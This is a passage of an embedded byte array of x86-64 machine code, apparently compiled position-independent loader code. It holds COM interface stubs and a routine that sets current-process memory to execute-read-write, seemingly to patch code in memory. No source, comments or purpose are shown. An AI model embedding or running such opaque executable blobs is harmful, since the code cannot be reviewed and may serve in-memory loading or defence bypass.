1794 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1795 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
1796 0x7d, 0x20, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75,
1797 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88, 0x04,
1798 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1799 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x07, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
1800 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88,
1801 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1802 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x85, 0xc0,
1803 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1804 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00,
1805 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00,
1806 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4,
1807 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1808 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x08, 0x48,
1809 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00,
1810 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x48,
1811 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1812 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0,
1813 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00,
1814 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02,
1815 0x01, 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10,
1816 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1817 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1818 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1819 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x48,
1820 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x01,
1821 0x00, 0x00, 0x48, 0x89, 0x95, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1822 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x03,
1823 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1824 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xff, 0x03, 0x00, 0x00, 0x48, 0x89,
1825 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1826 0x48, 0x8d, 0x15, 0x1c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
1827 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1828 0x40, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x85, 0xc8,
1829 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x04, 0x00,
1830 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1831 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89,
1832 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1833 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
1834 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1835 0x3b, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xc8,
1836 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x39, 0x05, 0x00,
1837 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1838 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x37, 0x05, 0x00, 0x00, 0x48, 0x89,
1839 0x50, 0x48, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1840 0x48, 0x8d, 0x15, 0x35, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
1841 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1842 0x33, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x85, 0xc8,
1843 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00,
1844 0x00, 0x48, 0x89, 0x50, 0x60, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1845 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00, 0x00, 0x48, 0x89,
1846 0x50, 0x68, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1847 0x48, 0x8d, 0x15, 0x64, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
1848 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1849 0x62, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x85, 0xc8,
1850 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x60, 0x05, 0x00,
1851 0x00, 0x48, 0x89, 0x90, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1852 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5b, 0x05, 0x00,
1853 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1854 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1855 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1856 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1857 0x00, 0x48, 0x89, 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1858 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1859 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1860 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x46, 0x05, 0x00,
1861 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1862 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x49, 0x05, 0x00,
1863 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1864 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x44, 0x05, 0x00,
1865 0x00, 0x48, 0x89, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1866 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x47, 0x05, 0x00,
1867 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1868 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x42, 0x05, 0x00,
1869 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1870 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x05, 0x00,
1871 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1872 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1873 0x00, 0x48, 0x89, 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1874 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1875 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1876 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1877 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1878 0x01, 0x00, 0x00, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1879 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00,
1880 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
1881 0x05, 0xed, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x49, 0x89, 0xd0,
1882 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0xe8, 0x3e,
1883 0xb3, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x4c, 0x8b,
1884 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1885 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8d, 0x45, 0xa0, 0x48, 0x89, 0xc1, 0x41,
1886 0xff, 0xd0, 0x89, 0x85, 0xac, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x01,
1887 0x00, 0x00, 0x00, 0x75, 0x45, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1888 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x30, 0x48,
1889 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x10, 0x48, 0x8b,
1890 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x94, 0x08, 0x00, 0x00,
1891 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x49,
1892 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xac, 0x01,
1893 0x00, 0x00, 0x8b, 0x85, 0xac, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30,
1894 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1895 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1896 0x20, 0x48, 0x83, 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00,
1897 0x80, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1898 0x40, 0x28, 0x48, 0x8d, 0x88, 0x04, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45,
1899 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x51,
1900 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48,
1901 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x14, 0x08, 0x00, 0x00, 0x48, 0x8b,
1902 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1903 0x2c, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10,
1904 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x94, 0x08, 0x00, 0x00, 0x48,
1905 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2,
1906 0xe8, 0x07, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45,
1907 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00,
1908 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
1909 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d,
1910 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
1911 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45,
1912 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f,
1913 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4,
1914 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1915 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48,
1916 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00,
1917 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8,
1918 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1919 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1920 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
1921 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1922 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1923 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89,
1924 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75,
1925 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10,
1926 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48,
1927 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1928 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28,
1929 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20,
1930 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1931 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89,
1932 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
1933 0x00, 0x4c, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1934 0x10, 0x4c, 0x8b, 0x45, 0x38, 0x8b, 0x4d, 0x28, 0x48, 0x8b, 0x55, 0x20,
1935 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
1936 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1937 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1938 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
1939 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c,
1940 0x8b, 0x50, 0x58, 0x44, 0x0f, 0xb7, 0x45, 0xec, 0x48, 0x8b, 0x45, 0x10,
1941 0x48, 0x8b, 0x40, 0x10, 0x8b, 0x4d, 0x18, 0x48, 0x8b, 0x55, 0x50, 0x48,
1942 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54, 0x24,
1943 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8b,
1944 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x41, 0x89,
1945 0xc8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
1946 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55,
1947 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1948 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1949 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1950 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1951 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1952 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1953 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1954 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1955 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66, 0x89, 0x45, 0x18,
1956 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1957 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b,
1958 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50,
1959 0x70, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x41, 0xb9, 0x00,
1960 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0xfd, 0xff,
1961 0xff, 0xff, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0xb8, 0x00, 0x00, 0x00,
1962 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1963 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1964 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1965 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1967 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1968 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1969 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1970 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1971 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1972 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18,
1973 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1974 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c,
1975 0x89, 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1976 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1977 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1978 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
1979 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1980 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1981 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
1982 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1983 0x40, 0x28, 0x48, 0x8b, 0x50, 0x58, 0x8b, 0x45, 0x18, 0x89, 0xc1, 0xff,
1984 0xd2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
1985 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1986 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1987 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1988 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1989 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1990 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1991 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1992 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
1993 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00,
1994 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1995 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf,
1996 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1997 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1998 0x48, 0x8b, 0x45, 0x30, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1999 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
2000 0x89, 0x55, 0x18, 0x8b, 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d,
2001 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d,
2002 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
2003 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x28, 0x03,
2004 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0xd8, 0xb1,
2005 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75,
2006 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xfe, 0x01, 0x00, 0x00, 0x48,
2007 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0x9c, 0x05, 0x00, 0x00, 0x48, 0x8b,
2008 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
2009 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9b, 0xae, 0xff, 0xff, 0x48,
2010 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00,
2011 0x00, 0x00, 0x00, 0xe9, 0xc5, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x05, 0x2e,
2012 0xff, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x02, 0xff, 0xff, 0xff, 0x48, 0x29,
2013 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79, 0x0a, 0xb8,
2014 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
2015 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89, 0x45, 0xd0,
2016 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8,
2017 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54,
2018 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48,
2019 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1f, 0x0e,
